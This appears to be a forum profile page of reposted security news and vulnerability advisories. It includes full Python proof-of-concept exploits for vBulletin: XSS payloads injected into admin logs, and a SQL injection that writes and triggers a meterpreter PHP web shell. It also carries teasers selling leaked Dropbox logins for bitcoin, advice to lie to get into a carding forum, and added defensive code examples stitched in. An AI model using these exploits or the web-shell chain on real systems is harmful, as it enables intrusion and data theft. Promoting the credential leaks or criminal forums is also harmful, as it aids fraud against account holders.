Everything posted by Nytro

  1. Microsoft Windows Zero-Day Vulnerability "CVE-2014-4114" Used to Hack NATO

     Once again a Russian cyber espionage group has gained media attention by exploiting a Zero-day vulnerability in Microsoft’s Windows operating system to spy on the North Atlantic Treaty Organization (NATO), Ukrainian and Polish government agencies, and a variety of sensitive European industries over the last year.

     ZERO-DAY VULNERABILITY IN MICROSOFT WINDOWS

     Researchers at cyber intelligence firm iSight Partners have discovered a zero-day vulnerability that impacts desktop and server versions of Windows, from Vista and Server 2008 to current versions. They also uncovered a latest cyber-spying campaign - suspected to be based in Russia - that uses this Zero-day vulnerability (CVE-2014-4114) to target government leaders and institutions for nearly five years.

     The recently detected Russian hacking group is dubbed as "Sandworm Team" by iSIGHT Partners because it found references to the Frank Herbert's "Dune" science fiction series in the malicious software code used by the Russian hackers.

     THE NOTORIOUS ZERO-DAY

     The zero-day vulnerability is "An exposed dangerous method vulnerability exists in the OLE package manager in Microsoft Windows and Server" that "allows an attacker to remotely execute arbitrary code," according to the report.

     "The vulnerability exists because Windows allows the OLE packager (packager.dll) to download and execute INF files," iSight Partners writes. "In the case of the observed exploit, specifically when handling Microsoft PowerPoint files, the packager allows a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources. This will cause the referenced files to be downloaded in the case of INF files, to be executed with specific commands."

     The Russian hacking group is probably working for the government and has been active since at least 2009 and, according to iSight Partners, the cyber espionage campaign is still ongoing.

     The intelligence firm began monitoring the hackers’ activity in late 2013 and discovered the zero-day vulnerability in late August. It "discovered a spear-phishing campaign targeting the Ukrainian government and at least one United States organization" during the NATO summit in Wales, where member states discussed Russia’s actions in Ukraine.

     "On September 3rd, our research and labs teams discovered that the spear-phishing attacks relied on the exploitation of a zero-day vulnerability impacting all supported versions of Microsoft Windows (XP is not impacted) and Windows Server 2008 and 2012," iSight writes. "A weaponized PowerPoint document was observed in these attacks. Though we have not observed details on what data was exfiltrated in this campaign, the use of this zero-day vulnerability virtually guarantees that all of those entities targeted fell victim to some degree."

     MICROSOFT TO RELEASE PATCH SOON

     The threat intelligence firm said it reported the critical zero-day vulnerability to the Microsoft Corp. and held off on disclosing the problem so that the software maker had time to fix the flaw.

     Microsoft plans to release a patch for the vulnerability on Tuesday in security bulletin MS14-060, as part of its monthly “Patch Tuesday” — an organized release of patches to vulnerabilities in the company’s software. A Microsoft spokesman said the company plans to roll out an automatic update to the affected versions.

     Source: Microsoft Windows Zero-Day Vulnerability "CVE-2014-4114" Used to Hack NATO
  2. Russian hackers target NATO, Ukraine and others: iSight

     By Jim Finkle
     BOSTON Tue Oct 14, 2014 12:05am EDT

     (Reuters) - Russian hackers exploited a bug in Microsoft Windows and other software to spy on computers used by NATO, the European Union, Ukraine and companies in the energy and telecommunications sectors, according to cyber intelligence firm iSight Partners.

     ISight said it did not know what data had been found by the hackers, though it suspected they were seeking information on the Ukraine crisis, as well as diplomatic, energy and telecom issues, based on the targets and the contents of phishing emails used to infect computers with tainted files.

     The five-year cyber espionage campaign is still going on, according to iSight, which dubbed the operation "Sandworm Team" because it found references to the "Dune" science fiction series in the software code used by the hackers.

     The operation used a variety of ways to attack the targets over the years, iSight said, adding that the hackers began only in August to exploit a vulnerability found in most versions of Windows.

     ISight said it told Microsoft Corp about the bug and held off on disclosing the problem so the software maker had time to fix it. A Microsoft spokesman said the company plans to roll out an automatic update to affected versions of Windows on Tuesday.

     There was no immediate comment from the Russian government, NATO, the EU or the Ukraine government.

     Researchers with Dallas-based iSight said they believed the hackers are Russian because of language clues in the software code and because of their choice of targets. "Your targets almost certainly have to do with your interests. We see strong ties to Russian origins here," said John Hulquist, head of iSight's cyber espionage practice. The firm plans to release a 16-page report on Sandworm Team to its clients on Tuesday.

     While technical indicators do not indicate whether the hackers have ties to the Russian government, Hulquist said he believed they were supported by a nation state because they were engaging in espionage, not cyber crime.

     For example, in December 2013, NATO was targeted with a malicious document on European diplomacy. Several regional governments in the Ukraine and an academic working on Russian issues in the United States were sent tainted emails that claimed to contain a list of pro-Russian extremist activities, according to iSight.

     The firm said its researchers uncovered evidence that some Ukrainian government computer systems were infected, but they were unable to remotely confirm specific victims among those systems that had been targeted. Still, researchers believe a large percentage of those targeted systems were infected because the malicious software used was very sophisticated, using a previously unknown attack method that enabled it to get past virtually all known security protections, said Drew Robinson, a senior technical analyst with iSight Partners.

     ISight said it had alerted some victims of Sandworm Team, but declined to elaborate.

     The iSight research is the latest in a series of private sector security reports that link Moscow to some of the most sophisticated cyber espionage uncovered to date. Russia's Kaspersky Lab in August released details on a campaign that attacked two spy agencies and hundreds of government and military targets across Europe and the Middle East.

     (Reporting by Jim Finkle; Additional reporting by Alastair Macdonald; Editing by Tiffany Wu)

     Source: Russian hackers target NATO, Ukraine and others: iSight | Reuters
     Others: Russian 'Sandworm' Hack Has Been Spying on Foreign Governments for Years | WIRED
  3. Dropbox Hack Second Teaser. As promised here is another batch of Hacked Dropbox accounts from close to 7 million total hacked accounts. We will keep releasing more to the public as donations come in, show your support. Send bitcoin donations to 1Fw7QqUgzbns7yWHH32UnmMxmMMwu6MC6h Enjoy! More to come. As previously, all Dropbox logins are in the same format, login:Password

     Via: DROPBOX.COM Hacked Second Teaser - Pastebin.com
     Others: http://pastebin.com/NtgwpfVm
     Others: http://pastebin.com/CsN3SrGA
  4. ***** DROPBOX HACKED ***** 6,937,081 DROPBOX ACCOUNTS HACKED PHOTOS - VIDEOS - OTHER FILES MORE BITCOIN = MORE ACCOUNTS PUBLISHED ON PASTEBIN As more BTC is donated , More pastebin pastes will appear To find them, simply search for "DROPBOX HACKED" and you will see any additional pastes as they are published. FIRST TEASER - 400 DROPBOX ACCOUNTS Just to get things going... SEND BTC DONATIONS TO 1Fw7QqUgzbns7yWHH32UnmMxmMMwu6MC6h COME BACK AND CHECK PASTEBIN FOR NEW DROPBOX DROPS THE MORE BTC DONATED WILL REFLECT HOW MANY MORE LOGIN AND PASSWORDS ARE RELEASED PUBLIC. START OF DROPBOX HACKED ACCOUNT LOGIN AND PASSWORDS

     Via: DROPBOX.COM HACKED First Teaser - Pastebin.com
  5. You go there for two reasons: 1. You sell: CCs, banking trojans or other junk 2. You buy: CCs, banking trojans or other junk. Talk to the admin and tell him why you want to get in. Lie to him about something.
  6. A fork of TrueCrypt's code, VeraCrypt strengthens the open source encryption software's transformation process and addresses other weaknesses.

     By Paul Rubens | Posted October 13, 2014

     If you're reluctant to continue using TrueCrypt now that the open source encryption project has been abandoned, and you don't want to wait for the CipherShed fork to mature, one alternative that's well worth investigating is VeraCrypt.

     VeraCrypt is also a fork of the original TrueCrypt code, and it was launched in June 2013. IT security consultant Mounir Idrassi, who is based in France, runs the project and is its main contributor.

     Idrassi's motivation for developing VeraCrypt stems back to 2012 when he was asked to integrate TrueCrypt with a client's product. Before doing this he carried out a security audit of the code and discovered some issues. "There were no big problems, no backdoors or anything like that. But there were some small things, so we decided to start VeraCrypt," he said.

     Idrassi said the main weakness in TrueCrypt was that - in his view - it was not secure against brute force attacks. Specifically, the way the software transformed a password to derive a key was not good enough, he said. "TrueCrypt uses a transformation that is not very complex. It is not sufficient, especially now with cloud cracking systems," he explained.

     TrueCrypt Weakness

     In technical terms, when a system partition is encrypted, TrueCrypt uses PBKDF2-RIPEMD160 with 1,000 iterations. For standard containers and other (i.e. non system) partitions, TrueCrypt uses at most 2,000 iterations.

     What Idrassi did was beef up the transformation process. VeraCrypt uses 327,661 iterations of the PBKDF2-RIPEMD160 algorithm for system partitions, and for standard containers and other partitions it uses 655,331 iterations of RIPEMD160 and 500,000 iterations of SHA-2 and Whirlpool, he said.

     While this makes VeraCrypt slightly slower at opening encrypted partitions, it makes the software a minimum of 10 and a maximum of about 300 times harder to brute force. "Effectively, something that might take a month to crack with TrueCrypt might take a year with VeraCrypt," Idrassi said.

     As a result of this change, the VeraCrypt storage format is incompatible with TrueCrypt. While that could be a problem for anyone looking to move from TrueCrypt to VeraCrypt, Idrassi said he is working on a conversion tool which will be available within the next three months.

     Better than TrueCrypt

     As well as increasing the number of iterations that are carried out, Idrassi said he has addressed weaknesses in the API and drivers, and in parameter checking. The code has also been run against static analysis tools and changes made to correct defects that the analysis detected.

     "Our focus has been on security so far, but the next step will be to add new features," Idrassi said, adding that new features will include compatibility with UEFI (to make the software work with Windows 8 and 10, for example) and capabilities for steganography – used to hide information in things like digital image files.

     An obvious question to ask is whether Idrassi has considered teaming up with the CipherShed project. He said he was contacted by Bill Cox, a member of the CipherShed project management committee, back in June and asked to help, but he is too busy. "I don't have a lot of time but I can certainly contribute patches and things like that," he said.

     But there are other reasons why Idrassi is reluctant to get involved. "The main issue I have is that we don't agree on one thing: CipherShed think it is OK to continue using the TrueCrypt format (using the smaller number of iterations.) But we don't consider it secure enough - not to provide a high level of security against people or organizations with huge resources," he said.

     The NSA Effect

     Idrassi hinted that breaking compatibility with TrueCrypt is a good idea for another reason too. "For more than 10 years, law enforcement agencies have developed an infrastructure and tools to do forensic analysis of TrueCrypt volumes," he said.

     Changing format and adding complexity is therefore not something that security agencies welcome, which, he suggested, makes it a problem for any U.S. based developers to contribute to VeraCrypt. "If you contribute to a project like this then you will be on a watch list in the U.S. We are based in France, so this is not a problem for us," he said.

     As a result, VeraCrypt has few contributors apart from Idrassi himself. "This is not a game," he said. "It is very serious and we do it as professionals. We are very clear: The project is public, the French authorities are aware of it. But that's why not a lot of people contribute."

     No TrueCrypt Conspiracy

     As for the reason that TrueCrypt was abandoned by its original authors, Idrassi sees no cause for alarm. "I am sure the people involved in TrueCrypt couldn't have stayed anonymous and the security agencies knew who they were," he said. "But when you look at the code, you get the idea that these people must have been in their 40s back in 1995. So now they are in their 60s, and they are probably tired or retired.

     "When they stopped the project they knew that it would cause new initiatives to start. I certainly don't believe there was anything suspicious," Idrassi said.

     Paul Rubens has been covering enterprise technology for over 20 years. In that time he has written for leading UK and international publications including The Economist, The Times, Financial Times, the BBC, Computing and ServerWatch.

     Source: VeraCrypt a Worthy TrueCrypt Alternative - eSecurity Planet
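
     The iteration counts quoted in the article above, turned into measured cost per password guess and into the equivalent gain in password entropy. This is an added example, not code from the article, VeraCrypt or TrueCrypt; it assumes PBKDF2-HMAC-SHA512 as a stand-in PRF (RIPEMD-160 is often unavailable in current OpenSSL builds), and all function names are hypothetical.

```python
"""Cost of the PBKDF2 iteration counts quoted in the article (added example)."""
import hashlib
import math
import os
import time

# (label, TrueCrypt iterations, VeraCrypt iterations), all as quoted in the article.
COMPARISONS = [
    ("system partition, RIPEMD160", 1_000, 327_661),
    ("container, RIPEMD160", 2_000, 655_331),
    ("container, SHA-2/Whirlpool", 2_000, 500_000),
]


def derive_header_key(password: bytes, salt: bytes, iterations: int) -> bytes:
    """One password guess costs one call to this function.

    Assumption of this example: SHA-512 replaces RIPEMD-160 as the PRF.
    The cost argument is the same for any PBKDF2 PRF.
    """
    return hashlib.pbkdf2_hmac("sha512", password, salt, iterations, dklen=64)


def seconds_per_guess(iterations: int, samples: int = 3) -> float:
    """Best-of-N wall-clock time for a single key derivation on this machine."""
    salt = os.urandom(64)
    best = float("inf")
    for i in range(samples):
        start = time.perf_counter()
        derive_header_key(b"candidate-%d" % i, salt, iterations)
        best = min(best, time.perf_counter() - start)
    return best


def work_factor(old_iterations: int, new_iterations: int) -> float:
    """How many times more work each guess costs; PBKDF2 cost is linear in iterations."""
    return new_iterations / old_iterations


def equivalent_entropy_bits(factor: float) -> float:
    """Password entropy (bits) that would slow an attacker by the same factor."""
    return math.log2(factor)


def days_to_exhaust(candidates: int, sec_per_guess: float, workers: int = 1) -> float:
    """Expected days to hit the password: half the candidate list, split over workers."""
    return (candidates / 2) * sec_per_guess / workers / 86_400


if __name__ == "__main__":
    wordlist = 10_000_000  # constructed dictionary size for the estimate
    for label, old, new in COMPARISONS:
        t_old, t_new = seconds_per_guess(old), seconds_per_guess(new)
        factor = work_factor(old, new)
        print(f"{label}: {old} -> {new} iterations")
        print(f"  nominal factor {factor:.1f}x, measured {t_new / t_old:.1f}x")
        print(f"  same as adding {equivalent_entropy_bits(factor):.2f} bits of password entropy")
        print(f"  {wordlist:,} guesses, 1 worker: "
              f"{days_to_exhaust(wordlist, t_old):.3f} d -> {days_to_exhaust(wordlist, t_new):.1f} d")
```

     The stretch is worth roughly eight bits, about what one or two extra random characters add to a password, so a weak passphrase stays weak under either format.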
  7. Yes, it's a wreck. The exploits are here: https://rstforums.com/forum/exploituri-si-pocs.rst For Tapatalk the exploit wasn't public, only the advisory.
  8. /admincp/api.php /admincp/apistats.php /admincp/apilog.php Fixed the "1337" way
  9. CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth)

Overview

date : 10/12/2014
cvss : 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base
cwe : 79
vendor : vBulletin Solutions
product : vBulletin 4
versions affected : latest 4.x and 5.x (to date); verified <= 4.2.2 ; <= 5.0.x
* vBulletin 5.0.5 (verified)
* vBulletin 4.2.2 (verified)
* vBulletin 4.2.1 (verified)
* vBulletin 4.2.0 PL2 (verified)
exploitability :
* remotely exploitable
* requires authentication (apikey)
* requires non-default features to be enabled (API interface, API-Logging)
* requires user interaction to trigger exploit (admincp - admin views logs)
patch availability (to date) : None

Abstract

vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name) allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. Code is executed once an admin visits the API log page and clicks on the API clients name.

risk: rather low - due to the fact that the api key is required
you can probably use CVE-2014-2023 to obtain the api key

Details

vulnerable component: ./admincp/apilog.php?do=viewclient

apilog.php does not sanitize xmlrpc client provided data before passing it to print_label_row to generate the output page.

Proof of Concept (PoC)

see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021

1) prerequisites
1.1) enable API, generate API-key
     logon to AdminCP
     goto "vBulletin API"->"API-Key" and enable the API interface, generate key
     goto "vBulletin API"->"API-Log" and enable all API logging
2) run PoC
     edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
     run PoC, wait for SUCCESS! message
3) trigger exploit
     logon to AdminCP
     goto "vBulletin API"->"API-Log" and hit "view" in search results
     click on "client name"
     the injected msgbox pops up

Timeline

2014-01-14: initial vendor contact - no reply
2014-01-24: vendor contact - no reply
2014-10-13: public disclosure

Contact

tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021 (0x721427D8)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, cookielib, urllib, json, hashlib

class Exploit(object):

    baseurl = None
    cookies = None

    def __init__(self,baseurl,params, debuglevel=1):
        self.cookies = cookielib.LWPCookieJar()
        handlers = [
                    urllib2.HTTPHandler(debuglevel=debuglevel),
                    urllib2.HTTPSHandler(debuglevel=debuglevel),
                    urllib2.HTTPCookieProcessor(self.cookies)
                    ]
        self.browser = urllib2.build_opener(*handlers)
        self.baseurl=baseurl
        self.params = params

    def call(self,path="",data={}):
        assert(isinstance(data,dict))
        data = urllib.urlencode(data)

        req = urllib2.Request("%s%s"%(self.baseurl,path),data)
        req.add_header("Content-Type", "application/x-www-form-urlencoded")

        return self.browser.open(req)

    def call_json(self,path=None,data={}):
        try:
            x=self.call(path,data).read()
            print "raw_response", x
            resp = json.loads(x)
        except urllib2.HTTPError, he:
            resp = he.read()
        return resp

    def vb_init_api(self):
        params = {'api_m':'api_init'}
        params.update(self.params)
        data = self.call_json("?%s"%(urllib.urlencode(params)))
        self.session = data
        return data

    def vb_call(self, params):
        api_sig = self._vb_build_api_sig(params)
        req_params = self._vb_build_regstring(api_sig)
        params.update(req_params)
        data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
        if not isinstance(data, dict):
            return data
        if 'errormessage' in data['response'].keys():
            raise Exception(data)
        return data

    def _ksort(self, d):
        ret = []
        for key, value in [(k,d[k]) for k in sorted(d.keys())]:
            ret.append( "%s=%s"%(key,value))
        return "&".join(ret)

    def _ksort_urlencode(self, d):
        ret = []
        for key, value in [(k,d[k]) for k in sorted(d.keys())]:
            ret.append( urllib.urlencode({key:value}))
        return "&".join(ret)

    def _vb_build_api_sig(self, params):
        apikey = self.params['apikey']
        login_string = self._ksort_urlencode(params)
        access_token = str(self.session['apiaccesstoken'])
        client_id = str(self.session['apiclientid'])
        secret = str(self.session['secret'])
        return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()

    def _vb_build_regstring(self, api_sig):
        params = {
                  'api_c':self.session['apiclientid'],
                  'api_s':self.session['apiaccesstoken'],
                  'api_sig':api_sig,
                  'api_v':self.session['apiversion'],
                  }
        return params

if __name__=="__main__":
    TARGET = "http://localhost:8008/sectest/vbulletin_5/api.php"
    APIKEY = "G4YvWVhp"
    DEBUGLEVEL = 0 # 1 to enable request tracking

    print "vBulletin 5.x / 4.x - XSS in API"
    ### 1. XSS
    '''
    vbulletin: admincp => settings: options => vbulletin API and Mobile Application Options
    * enable vbulletin API = yes
    * enable API log = yes

    xss in:
    1) http://xxxx/vb/admincp/apistats.php?do=client
    2) click on hex<video><source/**/onerror='alert(1)'>hex
    2.1) e.g. http://xxxx/vb/admincp/apilog.php?do=viewclient&apiclientid=1
    '''
    params = {'clientname':"hex<video><source/**/onerror='alert(/clientname_1/)'>hex1",
              'clientversion':"hex<video><source/**/onerror='alert(2)'>hex2",
              'platformname':"hex<video><source/**/onerror='alert(3)'>hex3",
              'platformversion':"hex<video><source/**/onerror='alert(4)'>hex4",
              'uniqueid':"hex<video><source/**/onerror='alert(5)'>hex5",
              'apikey':APIKEY}
    print "[ 1 ] - xss - inject alert() to admincp"
    x = Exploit(baseurl=TARGET,params=params,debuglevel=DEBUGLEVEL)
    vars = x.vb_init_api()
    print vars
    """
    $calls = array(
        'methods' => array(
            'login_login', 'api_init'
        ),
        'login_login' => array(
            'POST' => array(
                'vb_login_username' => 'admin',
                'vb_login_password' => 'password',
            ),
        ),
        'api_init' => array(
            'sessionhash' => '{session.dbsessionhash}'
        )
    );
    """
    print " [*] GOT SESSIONHASH:",vars.get('sessionhash','<no-sessiohash>')
    '''
    calls = {'methods':['api_init'],
             'api_init':{
                'sessionhash':vars['sessionhash']
             }}
    '''
    # just a dummy call
    x.vb_call(params={'api_m':'api_forumlist',
                      'type':'t',
                      'x':"1"})
    print "[ *] SUCCESS! - now make an admin visit %s/admincp/apilog.php?do=viewclient&apiclientid=%s to trigger the XSS :)"%("/".join(TARGET.split("/")[:-1]),vars['apiclientid'])
    print "-- quit --"

Source: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021
Exploit: https://github.com/tintinweb/pub/blob/master/pocs/cve-2014-2021/poc_cve-2014-2021.py
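The advisory says the client-supplied xmlrpc attributes reach the API log page unencoded. The following is an added defensive example (not vBulletin's code and not part of the advisory) that validates those five attributes at registration, HTML-encodes them at render time, and audits rows that were stored before the fix. The function names, the allowlist policy and the row layout are assumptions made for illustration.

```python
import html
import re

# The five attributes the advisory's PoC sets from the xmlrpc client side.
CLIENT_FIELDS = ("clientname", "clientversion", "platformname",
                 "platformversion", "uniqueid")

# Assumed policy: plain identifier characters only, bounded length.
_ALLOWED = re.compile(r"^[A-Za-z0-9 ._\-/()+]{1,64}$")


def validate_client_fields(params):
    """Split client attributes into (clean, rejected) at registration time."""
    clean, rejected = {}, {}
    for field in CLIENT_FIELDS:
        value = params.get(field, "")
        if isinstance(value, str) and _ALLOWED.match(value):
            clean[field] = value
        else:
            rejected[field] = value
    return clean, rejected


def render_row_unsafe(label, value):
    """Models the flaw: the stored value is placed into markup as-is."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (label, value)


def render_row(label, value):
    """Output-encode both cells so stored markup is displayed as text."""
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(str(label), quote=True),
        html.escape(str(value), quote=True),
    )


def audit_stored_clients(rows):
    """Return (apiclientid, field) for stored values holding HTML metacharacters.

    Stored XSS outlives the code fix, so rows written earlier need a review.
    """
    hits = []
    for row in rows:
        for field in CLIENT_FIELDS:
            value = str(row.get(field, ""))
            if html.escape(value, quote=True) != value:
                hits.append((row["apiclientid"], field))
    return hits


# Constructed sample rows; row 2 carries the markup string quoted in the PoC.
SAMPLE_ROWS = [
    {"apiclientid": 1, "clientname": "ExampleApp", "clientversion": "1.0",
     "platformname": "Android", "platformversion": "4.4.2", "uniqueid": "a1b2c3"},
    {"apiclientid": 2,
     "clientname": "hex<video><source/**/onerror='alert(1)'>hex",
     "clientversion": "1.0", "platformname": "Android",
     "platformversion": "4.4.2", "uniqueid": "d4e5f6"},
]

if __name__ == "__main__":
    for row in SAMPLE_ROWS:
        clean, rejected = validate_client_fields(row)
        print(row["apiclientid"], "rejected:", sorted(rejected))
        print(render_row("Client Name", row["clientname"]))
    print("stored rows to review:", audit_stored_clients(SAMPLE_ROWS))
```

Encoding at output is the control that closes the hole; the allowlist only narrows what gets stored in the first place.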
  10. CVE-2014-2022 - vbulletin 4.x - SQLi in breadcrumbs via xmlrpc API (post-auth)

Overview

date : 10/12/2014
cvss : 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C) base
cwe : 89
vendor : vBulletin Solutions
product : vBulletin 4
versions affected : latest 4.x (to date); verified <= 4.2.2
* vBulletin 4.2.2 (verified)
* vBulletin 4.2.1 (verified)
* vBulletin 4.2.0 PL2 (verified)
exploitability :
* remotely exploitable
* requires authentication (apikey)
patch availability (to date) : None

Abstract

vBulletin 4 does not properly sanitize parameters to breadcrumbs_create allowing an attacker to inject arbitrary SQL commands (SELECT).

risk: rather low - due to the fact that the api key is required
you can probably use CVE-2014-2023 to obtain the api key

Details

vulnerable component: ./includes/api/4/breadcrumbs_create.php
vulnerable argument: conceptid

which is sanitized as TYPE_STRING which does not prevent SQL injections.

Proof of Concept (PoC)

see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022

1) prerequisites
1.1) enable API, generate API-key
     logon to AdminCP
     goto "vBulletin API"->"API-Key" and enable the API interface, generate key
2) run PoC
     edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
     provide WWW_DIR which is the place to write the php_shell to (mysql must have permissions for that folder)
     Note: meterpreter_bind_tcp is not provided
     run PoC, wait for SUCCESS! message
     Note: poc will trigger meterpreter shell

meterpreter PoC scenario requires the mysql user to have write permissions which may not be the case in some default installations.

Timeline

2014-01-14: initial vendor contact, no response
2014-02-24: vendor contact, no response
2014-10-13: public disclosure

Contact

tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022 (0x721427D8)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, cookielib, urllib, json, hashlib

class Exploit(object):

    baseurl = None
    cookies = None

    def __init__(self,baseurl,params, debuglevel=1):
        self.cookies = cookielib.LWPCookieJar()
        handlers = [
                    urllib2.HTTPHandler(debuglevel=debuglevel),
                    urllib2.HTTPSHandler(debuglevel=debuglevel),
                    urllib2.HTTPCookieProcessor(self.cookies)
                    ]
        self.browser = urllib2.build_opener(*handlers)
        self.baseurl=baseurl
        self.params = params

    def call(self,path="",data={}):
        assert(isinstance(data,dict))
        data = urllib.urlencode(data)

        req = urllib2.Request("%s%s"%(self.baseurl,path),data)
        req.add_header("Content-Type", "application/x-www-form-urlencoded")

        return self.browser.open(req)

    def call_json(self,path=None,data={}):
        try:
            x=self.call(path,data).read()
            print "raw_response", x
            resp = json.loads(x)
        except urllib2.HTTPError, he:
            resp = he.read()
        return resp

    def vb_init_api(self):
        params = {'api_m':'api_init'}
        params.update(self.params)
        data = self.call_json("?%s"%(urllib.urlencode(params)))
        self.session = data
        return data

    def vb_call(self, params):
        api_sig = self._vb_build_api_sig(params)
        req_params = self._vb_build_regstring(api_sig)
        params.update(req_params)
        data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
        if not isinstance(data, dict):
            return data
        if 'errormessage' in data['response'].keys():
            raise Exception(data)
        return data

    def _ksort(self, d):
        ret = []
        for key, value in [(k,d[k]) for k in sorted(d.keys())]:
            ret.append( "%s=%s"%(key,value))
        return "&".join(ret)

    def _ksort_urlencode(self, d):
        ret = []
        for key, value in [(k,d[k]) for k in sorted(d.keys())]:
            ret.append( urllib.urlencode({key:value}))
        return "&".join(ret)

    def _vb_build_api_sig(self, params):
        apikey = self.params['apikey']
        login_string = self._ksort_urlencode(params)
        access_token = str(self.session['apiaccesstoken'])
        client_id = str(self.session['apiclientid'])
        secret = str(self.session['secret'])
        return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()

    def _vb_build_regstring(self, api_sig):
        params = {
                  'api_c':self.session['apiclientid'],
                  'api_s':self.session['apiaccesstoken'],
                  'api_sig':api_sig,
                  'api_v':self.session['apiversion'],
                  }
        return params

if __name__=="__main__":
    TARGET = "http://192.168.220.131/vbb4/api.php"
    APIKEY = "4FAVcRDc"
    REMOTE_SHELL_PATH = "/var/www/myShell.php"
    TRIGGER_URL = "http://192.168.220.131/myShell.php"
    DEBUGLEVEL = 0 # 1 to enable request tracking

    ### 2. sqli - simple - write outfile
    print "[ 2 ] - sqli - inject 'into outfile' to create file xxxxx.php"
    params = {'clientname':'fancy_exploit_client',
              'clientversion':'1.0',
              'platformname':'exploit',
              'platformversion':'1.5',
              'uniqueid':'1234',
              'apikey':APIKEY}
    x = Exploit(baseurl=TARGET,params=params)
    vars = x.vb_init_api()
    print vars
    '''
    x.vb_call(params={'api_m':'breadcrumbs_create',
                      'type':'t',
                      #'conceptid':"1 union select 1 into OUTFILE '%s'"%REMOTE_SHELL_PATH,
                      'conceptid':"1 union select 1 into OUTFILE '%s'"%(REMOTE_SHELL_PATH)
                      })
    print "[ *] SUCCESS! - created file %s"%TRIGGER_URL
    '''
    ### 3. sqli - put meterpreter shell and trigger it
    print "[ 3 ] - sqli - meterpreter shell + trigger"
    with open("./meterpreter_bind_tcp") as f:
        shell = f.read()
    shell = shell.replace("<?php","").replace("?>","") #cleanup tags
    shell = shell.encode("base64").replace("\n","") #encode payload
    shell = "<?php eval(base64_decode('%s')); ?>"%shell # add decoderstub
    shell = "0x"+shell.encode("hex") # for mysql outfile
    x.vb_call(params={'api_m':'breadcrumbs_create',
                      'type':'t',
                      'conceptid':"1 union select %s into OUTFILE '%s'"%(shell,REMOTE_SHELL_PATH)})
    print "[ *] SUCCESS! - triggering shell .. (script should not exit)"
    print "[ ] exploit: #> msfcli multi/handler PAYLOAD=php/meterpreter/bind_tcp LPORT=4444 RHOST=<TARGET_IP> E"
    print "[ *] shell active ... waiting for it to die ..."
    print urllib2.urlopen(TRIGGER_URL)
    print "[ ] shell died!"
    print "-- quit --"

Source: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022
Exploit: https://github.com/tintinweb/pub/blob/master/pocs/cve-2014-2022/poc_cve-2014-2022.py
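The root cause named in the advisory is that conceptid is cleaned as a string and then used in a numeric position of a query. The following added example (not vBulletin's code and not part of the advisory) shows that failure next to two fixes, using SQLite in memory. The table names, the `clean` helper and the `TYPE_UINT` label are assumptions made for illustration.

```python
import sqlite3


def make_db():
    """Build a constructed schema: one lookup table and one table holding a secret."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE concept (conceptid INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE setting (varname TEXT, value TEXT);
        INSERT INTO concept VALUES (1, 'General'), (2, 'Support');
        INSERT INTO setting VALUES ('apikey', 'CONSTRUCTED-KEY');
    """)
    return db


def clean(value, vartype):
    """Hypothetical input cleaner: the type decides what survives."""
    text = str(value).strip()
    if vartype == "TYPE_STRING":
        # A string type keeps SQL keywords and spaces intact.
        return text
    if vartype == "TYPE_UINT":
        # An unsigned-integer type accepts ASCII digits only.
        if not (text.isascii() and text.isdigit()):
            raise ValueError("conceptid must be an unsigned integer")
        return int(text)
    raise ValueError("unknown type %r" % vartype)


def lookup_vulnerable(db, raw):
    """String-cleaned value interpolated into a numeric position of the query."""
    conceptid = clean(raw, "TYPE_STRING")
    sql = "SELECT title FROM concept WHERE conceptid = %s" % conceptid
    return [row[0] for row in db.execute(sql)]


def lookup_hardened(db, raw):
    """Typed validation first, then a bound parameter."""
    conceptid = clean(raw, "TYPE_UINT")
    sql = "SELECT title FROM concept WHERE conceptid = ?"
    return [row[0] for row in db.execute(sql, (conceptid,))]


def lookup_bound_only(db, raw):
    """Binding alone also contains the input: it is compared as data, never parsed."""
    sql = "SELECT title FROM concept WHERE conceptid = ?"
    return [row[0] for row in db.execute(sql, (raw,))]


# Constructed input with the same shape as the value described in the advisory.
INJECTED = "1 UNION SELECT value FROM setting"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable :", lookup_vulnerable(db, INJECTED))
    print("bound only :", lookup_bound_only(db, INJECTED))
    try:
        lookup_hardened(db, INJECTED)
    except ValueError as exc:
        print("hardened   : rejected,", exc)
```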
  11. CVE-2014-2023 - Tapatalk for vbulletin 4.x - multiple blind sql injection (pre-auth)

Overview

date : 10/12/2014
cvss : 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base
cwe : 89
vendor : Tapatalk Inc
product : Tapatalk for vBulletin 4.x
versions affected: latest (to date)
* 5.2.1 (verified)
* 4.9.0 (verified)
exploitability :
* remotely exploitable
* NO authentication required
* NO user interaction required
* NO special configuration required (default settings)

Abstract

Tapatalk for vBulletin 4.x does not properly sanitize some xmlrpc calls allowing unauthenticated users to inject arbitrary SQL commands.

risk: high

!! Note !! - this is a preliminary VulnNote. The full PoC / Description will be made available within the next 7 days (see contact) to allow mobiquo to fix this.

googledork: see PoC code

Details

vulnerable component:
* stripped // see full VulnNote - (contact)

xmlrpc request is decoded, decoded attacker provided values are directly being used in sql query.

Proof of Concept (PoC)

